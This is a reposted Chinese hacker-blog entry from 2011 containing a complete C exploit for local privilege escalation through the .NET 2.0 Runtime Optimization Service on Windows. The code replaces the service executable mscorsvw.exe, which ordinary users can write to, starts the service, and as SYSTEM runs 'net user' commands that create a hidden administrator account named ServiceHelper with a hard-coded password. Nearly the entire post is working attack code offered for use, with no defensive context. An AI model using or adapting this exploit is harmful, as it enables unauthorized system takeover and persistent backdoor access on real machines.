注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

K8拉登哥哥's Blog

K8搞基大队[K8team] 信息安全 网络安全 0day漏洞 渗透测试 黑客

 
 
 

日志

 
 

Microsoft .NET2.0.50727运行时优化服务本地特权提升漏洞  

2011-03-17 16:15:52|  分类: 0day漏洞 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |


/*
# Exploit Title: .NET Runtime Optimization Service Privilege Escalation
# Date: 03-07-2011
# Author: XenoMuta <xenomuta@tuxfamily.org>
# Version: v2.0.50727
# Tested on: Windows XP (sp3), 2003 R2, 7
# CVE : n/a
  
    _  __                 __  ___      __
   | |/ /__  ____  ____  /  |/  /_  __/ /_____ _
   |   / _ \/ __ \/ __ \/ /|_/ / / / / __/ __ `/
  /   /  __/ / / / /_/ / /  / / /_/ / /_/ /_/ /
 /_/|_\___/_/ /_/\____/_/  /_/\__,_/\__/\__,_/
  
 xenomuta [at] tuxfamily.org
 xenomuta [at] gmail.com
 http://xenomuta.tuxfamily.org/ - Methylxantina 256mg
  
 This one's a no-brainer, plain simple:
  
 This service's EXE file can be overwritten by any non-admin domain user
 and local power users ( wich are the default permissions set ).
 This exploit compiles to a service that uses the original service's id.
  
 Tested on Windows 2003, WinXP (sp3) and Win7 
 ( my guess is that it runs on any win box running this service ).
  
 greetz to fr1t0l4y, L.Garay, siriguillo and the c0ff33 br34k t34m!!
   
 bless y'all!
  
*/
#include <stdio.h>
#include <windows.h>
  
SERVICE_STATUS          ServiceStatus;
SERVICE_STATUS_HANDLE   hStatus;
  
#define PWN_EXE     "c:\\WINDOWS\\Microsoft.NET\\Framework\\v2.0.50727\\mscorsvw.exe"
#define PWN_SHORT   "mscorsvw.exe"
#define PWN_NAME    ".NET Runtime Optimization Service v2.0.50727_X86"
#define PWN_ID      "clr_optimization_v2.0.50727_32"
  
void  ServiceMain(int argc, char** argv) {
    if (InitService()) {
       ServiceStatus.dwCurrentState = SERVICE_STOPPED;
       ServiceStatus.dwWin32ExitCode = -1;
       SetServiceStatus(hStatus, &ServiceStatus);
       return;
    }
   ServiceStatus.dwCurrentState = SERVICE_RUNNING;
   SetServiceStatus (hStatus, &ServiceStatus);
}
  
void ControlHandler(DWORD request);
int InitService();
  
int main(int argc, char **argv) {
    char acUserName[100];
    DWORD nUserName = sizeof(acUserName);
    GetUserName(acUserName, &nUserName);
  
    if (strcmp((char *)&acUserName, "SYSTEM")) {
        char *str = (char *)malloc(2048);
        memset(str, 0, 2048);
        snprintf(str, 2048, "%s.bak", PWN_EXE);
        if (rename(PWN_EXE, str) != 0) {
           fprintf(stderr, " :(  sorry, can't write to file.\n");
           exit(1);
        }
        CopyFile(argv[0], PWN_EXE, !0);
        snprintf(str, 2048, "net start \"%s\" 2> NUL > NUL",PWN_NAME);
        printf("\n >:D should have created a \n\n Username:\tServiceHelper\n Password:\tILov3Coff33!\n\n");
        system(str);
    }
  
    SERVICE_TABLE_ENTRY ServiceTable[2];
  
    ServiceTable[0].lpServiceName = PWN_ID;
    ServiceTable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMain;
  
    ServiceTable[1].lpServiceName = NULL;
    ServiceTable[1].lpServiceProc = NULL;
    StartServiceCtrlDispatcher(ServiceTable);
  
    return 0;
}
  
int InitService() {
    system("cmd /c net user ServiceHelper ILov3Coff33! /add & net localgroup Administrators ServiceHelper /add");
}
  评论这张
 
阅读(801)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2016